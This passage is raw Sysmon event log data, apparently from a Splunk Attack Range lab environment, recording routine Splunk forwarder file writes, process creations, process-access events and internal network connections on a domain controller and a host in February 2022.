Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B864E47997A6CDB39283555689A90181,SHA256=E1ABA0024CCC83A9A8630684452DCA0FD167E751B427251A54AB0764DC311227,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:13.592{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49534-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:17.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB54EC87655B3B75B0338738980E8B3E,SHA256=A4617610E0553542A6851C3A8701C07200B0DB2FDABE22AD8360FAEFBD5A5FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:17.695{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984CB5A4366403E74F1CC0BE70AE908F,SHA256=2B472B946C7BE116B6B512EEE3E1C8AA6B8A66195DE4751D23C861D18B67B401,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:18.711{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A4210220576EDF44AE0E59D15C48BD8,SHA256=F1532E0CFF87204E5E0222C9209BE54280A473E11AFEEAE7EC605A1EA1D9DF9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:18.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=935D8DD0AD70687EBF65B6AE235A564A,SHA256=263AF2EF39A772EEFC8404F57D6B5DFB1E1BBB0901BC46675D6F16134C606BB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:19.773{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80840B947D5F9484E4F5BBB615AC757F,SHA256=CC4FD1D9A58591BCDF6E922CF1CBE527174D1E262045CB07A29A3907CFDA1F8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.899{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18EB-6216-5707-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.896{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.896{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.896{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.896{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.896{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-18EB-6216-5707-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.895{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18EB-6216-5707-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.894{C8EA50B7-18EB-6216-5707-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.545{C8EA50B7-18EB-6216-5607-000000003802}7045304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18EB-6216-5607-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-18EB-6216-5607-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.213{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-18EB-6216-5607-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:19.215{C8EA50B7-18EB-6216-5607-000000003802}704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:20.789{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F751B86A68198A53EF29546638B6A10F,SHA256=E97C0FD363759DC7E0A07E337FA870B71F91D0C10B601431335608842ED0D5DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.880{C8EA50B7-18EC-6216-5807-000000003802}6160516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-18EC-6216-5807-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-18EC-6216-5807-000000003802}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:20.562{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program 